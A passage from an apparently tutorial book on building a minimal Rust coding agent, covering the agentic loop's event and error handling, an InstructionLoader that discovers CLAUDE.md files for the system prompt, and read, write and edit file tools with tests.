  2. ToolCall events fire for each tool call, using the tool_summary() helper to produce a one-line description.
  3. Done event fires before pushing the final assistant message, so the UI gets the text immediately.

Note the let _ = events.send(...) pattern. The send can fail if the receiver has been dropped (the UI task crashed or exited early). We ignore the error because the agent should finish its work regardless of whether anyone is watching.

Using events in practice

The caller creates an unbounded channel, passes the sender to the agent, and reads events from the receiver -- typically in a separate task:

#![allow(unused)]
fn main() {
let (tx, mut rx) = tokio::sync::mpsc::unbounded_channel();

let agent_handle = tokio::spawn(async move {
    agent.run_with_events("Fix the bug in main.rs", tx).await
});

while let Some(event) = rx.recv().await {
    match event {
        AgentEvent::ToolCall { summary, .. } => println!("{summary}"),
        AgentEvent::Done(text) => { println!("{text}"); break; }
        AgentEvent::Error(e) => { eprintln!("Error: {e}"); break; }
        _ => {}
    }
}
}

This two-task pattern is what a TUI builds on. The UI task renders events; the agent task runs the loop. They communicate through the channel.

Error handling philosophy

The agent has two distinct error strategies, and the boundary between them is intentional.

Tool errors become results

When a tool fails -- execution error, unknown tool -- the error becomes a string result that the model sees as a normal tool result. The loop continues. The model reads the error and adapts.

Tool error flow:
  LLM requests bash("some_command")
  -> Tool returns Err(e)
  -> unwrap_or_else converts to "error: {e}"
  -> Pushed as Message::ToolResult { id, content: "error: ..." }
  -> LLM sees error, tries different approach

This is essential for robust agents. Models make mistakes. Tools fail for legitimate reasons. The agent should recover, not crash.

Provider errors propagate

When the provider fails -- network timeout, authentication error, rate limit, malformed response -- the error propagates up via ? (in chat()) or via AgentEvent::Error (in chat_with_events()). The loop stops.

Provider error flow:
  Agent calls provider.chat()
  -> Provider returns Err(network timeout)
  -> chat() returns Err(network timeout)
  -> Caller handles it (retry, show error, etc.)

Provider errors are not the agent's problem. They need human or system-level intervention (check your API key, wait for rate limits, fix your network). The agent does not try to recover.

Message history management

The order in which messages are pushed into the history is load-bearing. After a tool-use turn:

#![allow(unused)]
fn main() {
StopReason::ToolUse => {
    let results = self.execute_tools(&turn.tool_calls).await;
    messages.push(Message::Assistant(turn));    // 1. Assistant message (with tool_calls)
    for (id, content) in results {
        messages.push(Message::ToolResult { id, content });  // 2. Tool results
    }
}
}

The resulting message sequence looks like:

[User]        "What files are in src/?"
[Assistant]   tool_calls: [bash("ls src/")]      <- includes the tool call
[ToolResult]  "main.rs\nlib.rs\n"                <- linked by call ID
[Assistant]   "There are two files: ..."          <- next LLM response

Why this order?

  1. API requirement: The Claude API (and OpenAI-compatible APIs) require that tool_result messages immediately follow the assistant message that generated the corresponding tool_use. Violating this causes a 400 error.

  2. ID linking: Each Message::ToolResult has an id that matches a ToolCall.id in the preceding assistant message. The LLM uses this to associate results with requests when there are multiple parallel tool calls.

  3. Context for the next turn: The LLM needs to see its own tool calls to understand what it asked for, and the results to know what happened. Both must be present in the history for the next provider.chat() call.

Putting it all together: a complete trace

Let's trace through a realistic scenario. The user asks: "What is 2 + 3?"

The agent has an AddTool registered. The mock provider is configured to return a tool call first, then a final answer.

Turn 0:

messages: [User("What is 2 + 3?")]
  -> provider.chat() returns: ToolUse, tool_calls: [add(a=2, b=3)]
  -> execute_tools: AddTool.call({a:2, b:3}) -> Ok("5")
  -> push: Assistant(tool_calls: [add(a=2, b=3)])
  -> push: ToolResult { id: "call_1", content: "5" }

Turn 1:

messages: [User, Assistant, ToolResult]
  -> provider.chat() returns: Stop, text: "The sum is 5"
  -> push: Assistant(text: "The sum is 5")
  -> return Ok("The sum is 5")

Two provider calls, one tool execution, clean exit. The final message history has 4 entries: User, Assistant (with tool call), ToolResult, Assistant (with text).

How this compares to Claude Code

Our SimpleAgent is a teaching implementation. Claude Code's real agent is considerably more complex. Here is what it adds:

FeatureOur agentClaude Code
Core looploop { match stop_reason }Same pattern, but with async hooks at every stage
StreamingSeparate run_with_eventsIntegrated SSE streaming with StreamProvider
PermissionsNoneFull permission pipeline checked before every tool call
Max turnsNoneConfigurable ceiling on loop iterations
TruncationNoneTool result size limits
CompactionNoneAuto-compacts when approaching token limit
HooksNonePre/post tool hooks with shell command execution
ConcurrencySequential tool executionParallel execution for safe tools
Error recoveryTool errors as resultsSame, plus retry logic for transient provider errors

The good news: the architecture is the same. Every feature in the right column plugs into the same loop structure. Permissions are checked in execute_tools before calling t.call(). Compaction runs at the top of the loop when token count is high. Hooks fire around tool execution.

Tests

Run the tests to verify your implementation:

cargo test -p mini-claw-code-starter test_single_turn_  # single_turn tests
cargo test -p mini-claw-code-starter test_simple_agent_  # SimpleAgent tests

What the tests verify

Single-turn tests (test_single_turn_):

  • test_single_turn_direct_response -- provider returns text with StopReason::Stop; verifies the agent returns that text directly
  • test_single_turn_one_tool_call -- provider returns a tool call then a final answer; verifies the agent executes the tool and returns the final text
  • test_single_turn_unknown_tool -- provider requests a tool that is not registered; verifies the agent returns an error string (not a panic) and the loop continues

SimpleAgent tests (test_simple_agent_):

  • test_simple_agent_text_response -- run() with a provider that returns text; verifies the response string
  • test_simple_agent_single_tool_call -- provider scripts a tool call followed by a final answer; verifies the agent loops correctly and returns the final text
  • test_simple_agent_unknown_tool -- provider requests a tool that is not registered; verifies the agent returns an error string (not a panic) and the loop continues
  • test_simple_agent_multi_step_loop -- provider scripts two tool calls then a final answer; verifies the agent loops correctly through multiple tool rounds

Implementation checklist

Open src/agent.rs in the starter. You will see unimplemented!() stubs with doc comments for each method. Here is what to fill in:

  1. SimpleAgent::new -- Initialize with the provider and an empty ToolSet.

  2. SimpleAgent::tool -- Push the tool into self.tools, return self.

  3. execute_tools -- Look up each tool, execute, catch errors. Return Vec<(String, String)>.

  4. chat -- The core loop. Call provider, match stop reason, dispatch tools, push messages, loop.

  5. run -- Create messages with Message::User(prompt), delegate to chat.

  6. run_with_history -- Same loop as chat but emit AgentEvents through a channel. Handle errors as events instead of ?.

  7. run_with_events -- Create messages, delegate to run_with_history.

Start with new and tool. Then implement execute_tools -- you can test it implicitly through run. Then chat, then run. Save the event methods for last.

Key takeaway

The agentic loop is surprisingly small -- a loop, a match on StopReason, and a helper that dispatches tool calls. Every feature a production agent adds (permissions, streaming, compaction, hooks) plugs into this same skeleton. If you understand chat(), you understand the architecture of every coding agent.

What you have now

After this chapter, you have a working coding agent. Not a complete one -- it has no real tools yet (those come in later chapters) -- but the core loop is done. You can register any tool that implements the Tool trait, point it at any provider that implements Provider, and the agent will autonomously loop until it has an answer.

This is the skeleton that everything else hangs on. Every feature you add later -- real tools like Bash and Read, permissions, streaming -- plugs into the loop you just built.

Check yourself


← Chapter 6: Tool Interface · Contents · Chapter 8: System Prompt →

Chapter 8: System Prompt

File(s) to edit: src/instructions.rs Test to run: cargo test -p mini-claw-code-starter instructions (InstructionLoader) Estimated time: 25 min

Every LLM-based agent starts with a system prompt -- an invisible preamble that shapes every response the model produces. A sloppy prompt gives you a chatbot. A carefully engineered prompt gives you a coding agent that follows safety rules, uses tools correctly, and adapts to the project it is working in.

Claude Code's system prompt is over 900 lines of assembled text. It is not written as a single string. It is built from modular sections -- identity, safety rules, tool schemas, environment info, project instructions -- stitched together by a builder at startup. Some sections never change between sessions (tool schemas, core instructions). Others change every time (working directory, git status, CLAUDE.md contents). This distinction is not cosmetic. It is the foundation of prompt caching, an optimization that can cut costs and latency dramatically.

In this chapter you will build the InstructionLoader -- the component that discovers project-specific CLAUDE.md files by walking up the filesystem. We will also discuss system prompt architecture concepts (sections, static/dynamic splitting, prompt caching) that production agents like Claude Code use. Our starter focuses on the instruction loading piece, which is the most practically useful part.

Goal

Implement InstructionLoader in src/instructions.rs so that:

  1. InstructionLoader walks up the filesystem to discover and load CLAUDE.md files.
  2. load() concatenates discovered files into a single string with headers.
  3. system_prompt_section() wraps the loaded instructions for inclusion in a system prompt.

How instruction loading works

flowchart TD
    A[InstructionLoader::discover] -->|walks upward| B["/home/user/CLAUDE.md"]
    A -->|walks upward| C["/home/user/project/CLAUDE.md"]
    A -->|starts here| D["/home/user/project/backend/CLAUDE.md"]
    B --> E[Reverse to root-first order]
    C --> E
    D --> E
    E --> F[InstructionLoader::load]
    F -->|concatenates with headers| G[Combined instructions string]
    G --> H[system_prompt_section]
    H --> I[Ready for system prompt]

Why system prompts matter for agents

A vanilla LLM is a text completer. It has no idea it can run bash commands, read files, or edit code -- unless you tell it. The system prompt is where you tell it.

For a coding agent, the system prompt must do several things:

  • Identity: "You are a coding agent with access to tools." Without this, the model may refuse tool calls or behave like a generic assistant.
  • Safety: "Do not delete files outside the working directory. Do not introduce security vulnerabilities." Safety rules constrain what the model will attempt.
  • Tool schemas: The JSON schema definitions for every available tool. The model needs these to know how to call tools -- what parameters they accept, which are required, what types they expect.
  • Environment: The working directory, OS, shell, git status. This context prevents the model from guessing about the environment.
  • Project instructions: Contents of CLAUDE.md files that tell the model about project conventions, preferred patterns, and things to avoid.

Claude Code assembles all of these into a single system prompt before each conversation. Sections are ordered deliberately, and a cache boundary separates the parts that change from the parts that do not.

Concepts: sections and cache boundaries

Before diving into the code, let's understand how production agents like Claude Code structure their system prompts. These concepts inform the design even though our starter takes a simpler approach.

Prompt sections

A production system prompt is built from modular sections -- identity, safety rules, tool schemas, environment info, project instructions. Each section is a named chunk of text that renders as:

# identity
You are a coding agent. You help users with software engineering tasks
using the tools available to you.

The heading helps the LLM parse the prompt structure and makes debugging easier when you inspect the assembled prompt.

Static vs. dynamic: the cache boundary

LLM API calls are expensive. Every token in the system prompt is processed on every request. Claude's prompt caching feature lets you mark a prefix of the prompt as cacheable -- the API processes it once, caches the internal state, and reuses it on subsequent requests. This can reduce latency by up to 85% and cost by up to 90% for long prompts.

But caching only works for a prefix. If any byte in the cached prefix changes, the cache is invalidated. This means you need to put the stable parts first and the changing parts last:

+---------------------------------------+
| Static sections (cacheable)           |
|  - Identity                           |
|  - Safety instructions                |
|  - Tool schemas                       |
|                                       |
|  [these rarely change]                |
+-------- CACHE BOUNDARY ---------------+
| Dynamic sections (per-session)        |
|  - Working directory                  |
|  - Git status                         |
|  - CLAUDE.md instructions             |
|  - Custom user instructions           |
|                                       |
|  [these change every session]         |
+---------------------------------------+

Claude Code calls this boundary SYSTEM_PROMPT_DYNAMIC_BOUNDARY. Everything above it is sent with a cache control header. Everything below it is fresh on each request.

A production agent would implement a SystemPromptBuilder that maintains separate lists of static and dynamic sections, renders each half independently, and supports cache-aware providers. These types (SystemPromptBuilder, PromptSection) are conceptual in this chapter -- the starter does not include them. Instead, the starter implements InstructionLoader in src/instructions.rs, which is the most practically useful component to build from scratch.

InstructionLoader: discovering CLAUDE.md

Claude Code loads project-specific instructions from CLAUDE.md files. These files let users customize the agent's behavior per project -- preferred coding style, test commands, things to avoid. The agent discovers them by walking up the filesystem from the current working directory.

Open src/instructions.rs. Here is the starter stub:

#![allow(unused)]
fn main() {
pub struct InstructionLoader {
    file_names: Vec<String>,
}

impl InstructionLoader {
    pub fn new(file_names: &[&str]) -> Self {
        unimplemented!("Convert file_names to Vec<String>")
    }

    pub fn default_files() -> Self {
        Self::new(&["CLAUDE.md", ".mini-claw/instructions.md"])
    }

    pub fn discover(&self, start_dir: &Path) -> Vec<PathBuf> {
        unimplemented!(
            "Walk up from start_dir, collect matching files, reverse for root-first order"
        )
    }

    pub fn load(&self, start_dir: &Path) -> Option<String> {
        unimplemented!("Discover files, read each, join with headers showing source path")
    }

    pub fn system_prompt_section(&self, start_dir: &Path) -> Option<String> {
        unimplemented!("Call load(), wrap with instruction preamble")
    }
}
}

The loader is parameterized by file names to search for. The default configuration looks for CLAUDE.md and .mini-claw/instructions.md.

Rust concept: borrowed slices to owned collections

The constructor takes &[&str] -- a borrowed slice of borrowed string slices -- and converts it to Vec<String>. This is a common Rust pattern at API boundaries: accept borrowed data for flexibility (the caller can pass string literals, &String, or anything that derefs to &str), but store owned data internally so the struct has no lifetime parameter and can live independently of its creator.

Implementing new()

The constructor converts the &[&str] slice into owned String values:

#![allow(unused)]
fn main() {
pub fn new(file_names: &[&str]) -> Self {
    Self {
        file_names: file_names.iter().map(|s| s.to_string()).collect(),
    }
}
}

discover() -- walking upward

The discover() method starts at a given directory and walks toward the filesystem root, checking each directory for the target files:

#![allow(unused)]
fn main() {
pub fn discover(&self, start_dir: &Path) -> Vec<PathBuf> {
    let mut found = Vec::new();
    let mut dir = Some(start_dir.to_path_buf());

    while let Some(current) = dir {
        for name in &self.file_names {
            let candidate = current.join(name);
            if candidate.is_file() {
                found.push(candidate);
            }
        }
        dir = current.parent().map(|p| p.to_path_buf());
    }

    found.reverse(); // Root-first order
    found
}
}

The walk collects files from the start directory up to the root, then reverses the list so root-level files come first. This ordering matters: global instructions appear before project-specific ones, and the LLM sees the most specific instructions last (closest to the user prompt).

Consider a project at /home/user/project/backend:

/home/user/CLAUDE.md                  <-- global preferences
/home/user/project/CLAUDE.md          <-- project conventions
/home/user/project/backend/CLAUDE.md  <-- backend-specific rules

After discover(), the vector contains them in that order: global first, most specific last.

load() -- reading and concatenating

The load() method calls discover(), reads each file, and joins them into a single string. Each file's content is prefixed with # Instructions from <path> so the LLM knows where each block came from. Files are separated by --- markers. Empty or unreadable files are silently skipped. If no instruction files exist at all, load() returns None.

The output for two files looks like:

# Instructions from /home/user/CLAUDE.md

Use American English. Prefer explicit error handling.

---

# Instructions from /home/user/project/CLAUDE.md

Run tests with `cargo test`. Never modify generated files.

system_prompt_section() -- wrapping for the prompt

The system_prompt_section() method calls load() and wraps the result with an instruction preamble. This produces a string ready to insert into a system prompt. If no instruction files are found, it returns None.

The exact preamble should read:

#![allow(unused)]
fn main() {
format!(
    "The following project instructions were loaded automatically. \
     Follow them carefully:\n\n{content}"
)
}

The test checks for the substring "project instructions" in the output, so your preamble text must include those words.

Using InstructionLoader in a system prompt

In a production agent, the instruction loader is wired into the prompt assembly pipeline. The loaded instructions are always dynamic -- they depend on which directory the agent is launched from.

Here is how you might use InstructionLoader to build a simple system prompt:

#![allow(unused)]
fn main() {
let mut prompt = String::from("You are a coding agent.\n\n");

let loader = InstructionLoader::default_files();
if let Some(section) = loader.system_prompt_section(Path::new(cwd)) {
    prompt.push_str(&section);
}
}

A more sophisticated agent would separate static and dynamic sections for prompt caching (see the concepts discussion above), but this simple approach works well for getting started.

How Claude Code does it

Claude Code's prompt assembly follows the same principles at larger scale. Its system prompt includes identity, safety rules, tool schemas, behavioral guidelines, environment details, CLAUDE.md instructions from multiple levels, and session metadata -- routinely exceeding 900 lines.

Without prompt caching, every API call would reprocess all of that. Claude Code marks the cache boundary with a SYSTEM_PROMPT_DYNAMIC_BOUNDARY marker. The provider splits the system message at this boundary and sends the prefix with cache_control: { type: "ephemeral" }. The API caches the prefix's internal representation and reuses it for subsequent requests, often covering 80%+ of the prompt.

As an extension, you could build a SystemPromptBuilder that maintains separate lists of static and dynamic sections, renders each half independently, and lets a cache-aware provider split the prompt at the boundary. Our starter focuses on the instruction loading piece, which is the most practically useful component.

Running the tests

Run the InstructionLoader tests:

cargo test -p mini-claw-code-starter instructions

What the tests verify

  • test_instructions_instruction_loader_discover: Creates a temp directory with a CLAUDE.md file and verifies discover() finds it.
  • test_instructions_instruction_loader_load: Same setup, verifies load() returns the file's content.
  • test_instructions_instruction_loader_no_files: No instruction files exist. load() returns None.

Recap

You have built the instruction loading infrastructure:

  • InstructionLoader discovers CLAUDE.md files by walking up the filesystem. It concatenates them in root-first order so that global instructions appear before project-specific ones.
  • system_prompt_section() wraps discovered instructions for inclusion in a system prompt.

You also learned the key concepts behind production system prompt architecture:

  • Prompt sections break the system prompt into named, modular chunks.
  • The cache boundary separates what changes from what does not, enabling prompt caching -- a single optimization that can cut costs and latency by an order of magnitude on long prompts. Every production agent does this.

As an extension, you could implement PromptSection and SystemPromptBuilder types to manage the static/dynamic split structurally. The reference implementation (mini-claw-code) shows one approach.

Key takeaway

A system prompt is not a single string -- it is an assembly of modular sections, ordered so that stable content comes first (enabling prompt caching) and session-specific content comes last. The InstructionLoader is the simplest but most user-facing piece of this assembly: it gives every project a way to customize the agent's behavior through plain Markdown files.

What's next

In Chapter 9: File Tools you will implement the tools that let your agent interact with the filesystem -- reading, writing, and editing files. These are the tools whose schemas will eventually appear in the static portion of your system prompt.

Check yourself


← Chapter 7: The Agentic Loop (Deep Dive) · Contents · Chapter 9: File Tools →

Chapter 9: File Tools

File(s) to edit: src/tools/write.rs, src/tools/edit.rs (the TODO ch9: stubs). src/tools/read.rs was completed back in Chapter 2 — this chapter revisits it as the baseline and contrasts it with the design decisions that come with writing and editing. Tests to run: cargo test -p mini-claw-code-starter test_read_ (ReadTool), cargo test -p mini-claw-code-starter test_write_ (WriteTool), cargo test -p mini-claw-code-starter test_edit_ (EditTool) Estimated time: 50 min

Goal

  • Revisit ReadTool (built in Ch2) as the baseline and understand the trade-offs of its minimal design vs. production tools that add line-numbering and offset/limit.
  • Implement WriteTool with automatic parent directory creation so the agent can create new files without a separate mkdir step.
  • Implement EditTool with a uniqueness check so the agent can make surgical string replacements in existing files.
  • Understand why tool errors are returned as Err(...) in the starter (the agent loop converts them to messages the LLM can read and recover from -- the detailed rationale is in Chapter 6 §"Why tool errors never terminate the agent").

A coding agent that cannot touch the filesystem is just a chatbot with delusions of grandeur. It can describe code changes, suggest fixes, explain algorithms -- but it cannot do any of it. The tools you built in Chapter 6 gave your agent hands. In this chapter you give those hands something to hold: files.

File operations are the most fundamental tools in any coding agent's toolkit. Claude Code ships with Read, Write, and Edit tools (among many others), and every competitor -- Cursor, Aider, OpenCode -- has its own version. The operations are simple (read bytes, write bytes, search-and-replace), but the design choices around them determine whether the agent can reliably modify a codebase or whether it stumbles over its own edits. You will implement all three tools in this chapter: ReadTool, WriteTool, and EditTool.

How the file tools work together

flowchart LR
    W[WriteTool] -->|creates file| FS[(Filesystem)]
    E[EditTool] -->|search & replace| FS
    R[ReadTool] -->|reads content| FS
    W -.->|"auto-creates parent dirs"| FS
    E -.->|"checks uniqueness first"| FS
sequenceDiagram
    participant LLM
    participant Agent
    participant FS as Filesystem

    LLM->>Agent: write(path, content)
    Agent->>FS: create dirs + write file
    FS-->>Agent: ok
    Agent-->>LLM: "wrote /path/to/file"
    LLM->>Agent: edit(path, old, new)
    Agent->>FS: read, check uniqueness, replace, write
    FS-->>Agent: ok
    Agent-->>LLM: "edited /path/to/file"
    LLM->>Agent: read(path)
    Agent->>FS: read file
    FS-->>Agent: file contents
    Agent-->>LLM: file contents

6.1 ReadTool

ReadTool is the simplest of the file tools: it takes a path, reads the file with tokio::fs::read_to_string, and returns the raw contents as a string. No line numbering, no offset/limit, no transformation. That is what both the starter and the reference implementation (mini-claw-code/src/tools/read.rs) do -- we keep it deliberately minimal so the rest of the chapter (Write, Edit) has room to breathe.

Design discussion: why production agents add more

Production agents like Claude Code go further. Their read tool typically numbers every line (cat -n style) and supports partial reads via offset and limit parameters. Two reasons this matters in real systems:

  • Line numbers give the LLM a coordinate system. "Replace the string on line 42" is precise. "Replace the string somewhere around the middle of the function" is not. This becomes especially valuable for the Edit tool, where the model has to produce an exact string to match and numbered lines help it copy the right chunk.
  • Offset/limit protects the context window. A single 50k-line generated file can blow past the model's context. Paginated reads let the LLM fetch what it needs without burning the whole budget on one file.

Neither of these appear in the starter or the reference implementation in this book -- they are extensions we point at but deliberately leave out so the core Tool implementation stays a dozen lines. Adding them yourself is one of the listed extensions at the end of the chapter.

The starter stub

Open src/tools/read.rs:

#![allow(unused)]
fn main() {
use anyhow::Context;
use serde_json::Value;

use crate::types::*;

pub struct ReadTool {
    definition: ToolDefinition,
}

impl Default for ReadTool {
    fn default() -> Self {
        Self::new()
    }
}

impl ReadTool {
    /// Create a new ReadTool with its JSON schema definition.
    ///
    /// The schema should declare one required parameter: "path" (string).
    pub fn new() -> Self {
        unimplemented!(
            "Create a ToolDefinition with name \"read\" and a required \"path\" parameter"
        )
    }
}

#[async_trait::async_trait]
impl Tool for ReadTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, _args: Value) -> anyhow::Result<String> {
        unimplemented!(
            "Extract \"path\" from args, read file with tokio::fs::read_to_string, return contents"
        )
    }
}
}

You need to fill in two methods:

  1. new() -- build a ToolDefinition with name "read" and a required "path" parameter.
  2. call() -- extract the path, read the file, and return its contents.

Implementing the ReadTool

The definition. One required parameter: path. The LLM sees this as a JSON Schema and knows it must provide path.

#![allow(unused)]
fn main() {
pub fn new() -> Self {
    Self {
        definition: ToolDefinition::new("read", "Read the contents of a file.")
            .param("path", "string", "Absolute path to the file", true),
    }
}
}

The call() method. Read the file and return its contents as a String:

#![allow(unused)]
fn main() {
async fn call(&self, args: Value) -> anyhow::Result<String> {
    let path = args["path"]
        .as_str()
        .context("missing 'path' argument")?;

    let content = tokio::fs::read_to_string(path)
        .await
        .with_context(|| format!("failed to read '{path}'"))?;

    Ok(content)
}
}

Rust concept: anyhow::Context for rich errors

The .context("missing 'path' argument")? and .with_context(|| format!("failed to read '{path}'")) calls wrap the underlying error with a human-readable message. context() takes a static string; with_context() takes a closure for dynamic messages (avoiding the allocation when the ? path is not taken). Both return anyhow::Error, which chains the original error underneath -- so the full error message reads like "failed to read 'foo.rs': No such file or directory". This chaining is what makes anyhow errors informative without custom error types.

Notice that call() returns anyhow::Result<String>, not ToolResult. The starter's Tool trait is simplified -- tools return plain strings on success. If the tool encounters an error (missing argument, I/O failure), it returns Err(...). The agent loop converts errors to error messages that the LLM sees.

Possible extensions. A production-grade ReadTool would add offset and limit parameters for partial reads and format output with tab-separated line numbers (like cat -n). Neither is in this book's reference implementation; both are well-scoped exercises if you want to go further.

What the output looks like

Given a file with three lines:

alpha
beta
gamma

The tool returns the raw file contents:

alpha
beta
gamma

This is the simplest approach. Production tools extend it with line numbers and partial-read support, which are useful for large files and for giving the LLM precise line references for later edits -- see the design discussion above.


6.2 WriteTool

Writing a file is conceptually simple: take a path and content, write the content to the path. But there is one practical detail that makes a big difference: creating parent directories automatically.

When the LLM writes src/handlers/auth/middleware.rs, the src/handlers/auth/ directory might not exist yet. A naive tool would fail with "No such file or directory." The agent would then need to call bash("mkdir -p ...") and retry. This wastes a tool-use round and confuses the model. Better to handle it silently.

The starter stub

Open src/tools/write.rs:

#![allow(unused)]
fn main() {
use anyhow::Context;
use serde_json::Value;

use crate::types::*;

pub struct WriteTool {
    definition: ToolDefinition,
}

impl Default for WriteTool {
    fn default() -> Self {
        Self::new()
    }
}

impl WriteTool {
    /// Schema: required "path" and "content" parameters.
    pub fn new() -> Self {
        unimplemented!(
            "Use ToolDefinition::new(name, description).param(...).param(...)"
        )
    }
}

#[async_trait::async_trait]
impl Tool for WriteTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, _args: Value) -> anyhow::Result<String> {
        unimplemented!(
            "Extract path and content, create parent dirs, write file, return format!(\"wrote {path}\")"
        )
    }
}
}

Implementing the WriteTool

The definition. Two required parameters: path and content.

#![allow(unused)]
fn main() {
pub fn new() -> Self {
    Self {
        definition: ToolDefinition::new("write", "Write content to a file, creating directories as needed")
            .param("path", "string", "Absolute path to write to", true)
            .param("content", "string", "Content to write", true),
    }
}
}

The call() method. Extract the arguments, create parent directories, write the file, and return a confirmation string:

#![allow(unused)]
fn main() {
async fn call(&self, args: Value) -> anyhow::Result<String> {
    let path = args["path"]
        .as_str()
        .context("missing 'path' argument")?;
    let content = args["content"]
        .as_str()
        .context("missing 'content' argument")?;

    // Create parent directories
    if let Some(parent) = std::path::Path::new(path).parent() {
        if !parent.as_os_str().is_empty() {
            tokio::fs::create_dir_all(parent).await?;
        }
    }

    tokio::fs::write(path, content).await?;

    Ok(format!("wrote {path}"))
}
}

The return value is format!("wrote {path}") -- a simple confirmation string. The agent sees this and knows the write succeeded.

Walking through the code

Two required parameters. Both path and content are required. There is no optional behavior here -- you always need both.

Auto-creating directories. The create_dir_all call is the key design choice. It mirrors mkdir -p -- if the directory already exists, it is a no-op. If intermediate directories are missing, it creates them all. The guard !parent.as_os_str().is_empty() handles the edge case where the path has no parent component (e.g., a bare filename like "file.txt"), where calling create_dir_all("") would fail.

Overwrite semantics. tokio::fs::write overwrites the file if it already exists and creates it if it does not. There is no append mode, no conflict detection. This is deliberate -- the tool is a clean write, not a merge. If the LLM wants to modify an existing file, it should use the Edit tool.

Confirmation string. The result reports "wrote /path/to/file". This gives the model confirmation that the write succeeded.


6.3 EditTool

The Edit tool is the most interesting of the three, and it teaches the most important design lesson in this book: errors are values, not exceptions.

The Edit tool performs a search-and-replace on a file. It takes a path, an old_string to find, and a new_string to replace it with. The critical constraint: old_string must appear exactly once in the file. Zero matches means the model got the string wrong. More than one match means the replacement is ambiguous -- we do not know which occurrence to change.

Both of these are expected failure modes, not bugs. The model frequently gets strings slightly wrong (missing whitespace, wrong indentation, stale content from a previous edit). The tool must report these failures clearly so the model can correct itself.

The starter stub

Open src/tools/edit.rs:

#![allow(unused)]
fn main() {
use anyhow::{Context, bail};
use serde_json::Value;

use crate::types::*;

pub struct EditTool {
    definition: ToolDefinition,
}

impl Default for EditTool {
    fn default() -> Self {
        Self::new()
    }
}

impl EditTool {
    /// Schema: required "path", "old_string", "new_string" parameters.
    pub fn new() -> Self {
        unimplemented!(
            "Use ToolDefinition::new(name, description).param(...).param(...).param(...)"
        )
    }
}

#[async_trait::async_trait]
impl Tool for EditTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, _args: Value) -> anyhow::Result<String> {
        unimplemented!(
            "Extract args, read file, verify old_string appears exactly once, replace, write back"
        )
    }
}
}

Implementing the EditTool

The definition. Three required parameters: path, old_string, and new_string.

#![allow(unused)]
fn main() {
pub fn new() -> Self {
    Self {
        definition: ToolDefinition::new(
            "edit",
            "Replace an exact string in a file. The old_string must appear exactly once.",
        )
        .param("path", "string", "Absolute path to the file to edit", true)
        .param("old_string", "string", "The exact string to find", true)
        .param("new_string", "string", "The replacement string", true),
    }
}
}

The call() method. Read the file, check uniqueness, replace, write back:

#![allow(unused)]
fn main() {
async fn call(&self, args: Value) -> anyhow::Result<String> {
    let path = args["path"]
        .as_str()
        .context("missing 'path' argument")?;
    let old = args["old_string"]
        .as_str()
        .context("missing 'old_string' argument")?;
    let new = args["new_string"]
        .as_str()
        .context("missing 'new_string' argument")?;

    let content = tokio::fs::read_to_string(path)
        .await
        .with_context(|| format!("failed to read '{path}'"))?;

    let count = content.matches(old).count();
    if count == 0 {
        bail!("old_string not found in '{path}'");
    }
    if count > 1 {
        bail!("old_string appears {count} times in '{path}', must be unique");
    }

    let updated = content.replacen(old, new, 1);
    tokio::fs::write(path, &updated).await?;

    Ok(format!("edited {path}"))
}
}

The return value is format!("edited {path}") on success.

Walking through the code

Three required parameters. path, old_string, and new_string are all required. The model must specify exactly what to find and what to replace it with. There is no regex, no line-number-based editing, no diff format. Just plain string replacement. This simplicity is a feature -- it is unambiguous and easy for the model to use correctly.

The uniqueness check. This is the heart of the tool:

#![allow(unused)]
fn main() {
let count = content.matches(old).count();
if count == 0 {
    bail!("old_string not found in '{path}'");
}
if count > 1 {
    bail!("old_string appears {count} times in '{path}', must be unique");
}
}

Rust concept: bail! macro

bail!("old_string not found in '{path}'") is shorthand for return Err(anyhow::anyhow!("...")). It immediately returns an error from the function with the given message. It is part of the anyhow crate and works in any function that returns anyhow::Result. Compare with ? (which propagates an existing error) -- bail! creates a new error on the spot.

Two branches, both returning errors via bail!. In the starter's simplified Tool trait, tools return anyhow::Result<String>. When the tool returns an Err, the agent loop converts it to an error message that the LLM sees. The model can then retry with a corrected string.

Error handling in the simplified trait

The starter's Tool trait returns anyhow::Result<String> from call(). This means error handling is straightforward -- use bail!() or ? for any failure, and the agent loop takes care of converting errors to messages the LLM can read.

In the agent's execute_tools method, a tool call is handled like this:

#![allow(unused)]
fn main() {
match tool.call(call.arguments.clone()).await {
    Ok(result) => result,
    Err(e) => format!("error: {e}"),
}
}

An Err from call() becomes a string like "error: old_string not found in 'foo.rs'". The model sees this and knows to try a different string.

A more sophisticated design (used by Claude Code) distinguishes between recoverable tool-level errors (returned as success values) and genuine I/O failures (returned as Err). The starter keeps things simple by using Err for both -- the agent loop handles them the same way regardless.


6.4 Integration: Write, Edit, Read

The real power of these tools comes from combining them. A typical agent workflow looks like this:

  1. Write a new file
  2. Edit to fix a bug or refine the code
  3. Read to verify the result

Here is what that looks like as tool calls:

Agent: I'll create the handler file.
-> write(path: "/tmp/project/handler.rs", content: "fn main() { println!(\"hello\"); }")
<- "wrote /tmp/project/handler.rs"

Agent: Let me update the greeting.
-> edit(path: "/tmp/project/handler.rs", old_string: "hello", new_string: "goodbye")
<- "edited /tmp/project/handler.rs"

Agent: Let me verify the change.
-> read(path: "/tmp/project/handler.rs")
<- "fn main() { println!(\"goodbye\"); }"

Each tool does one thing and communicates its result clearly. The agent sees the output of each step and decides what to do next. If the edit had failed (wrong string), the agent would see the error and retry with the correct string.

This write-edit-read pattern is how Claude Code modifies files in practice. It does not generate a complete file and overwrite -- that would lose any content outside the modified section. Instead, it uses surgical edits on the specific lines that need to change, then reads the result to confirm. This is more reliable and produces smaller diffs.


6.5 How Claude Code does it

Claude Code's file tools follow the same protocol but with more sophistication:

Read supports images and PDFs. It detects binary files and renders them appropriately (base64-encoded images are sent as multimodal content blocks). It has smarter truncation with token counting rather than character counting, and it warns when a file is empty.

Write checks for protected files. Claude Code maintains a list of files that should never be overwritten (.env, credentials.json, etc.) and blocks writes to them. It also integrates with the permission system to require user approval before overwriting existing files in certain modes.

Edit is considerably more powerful. It supports multiple edits in a single call, has a diff preview mode, handles encoding detection, and validates that the edit produces syntactically valid code (for supported languages). It also has a more nuanced uniqueness check that considers context lines around the match to disambiguate.

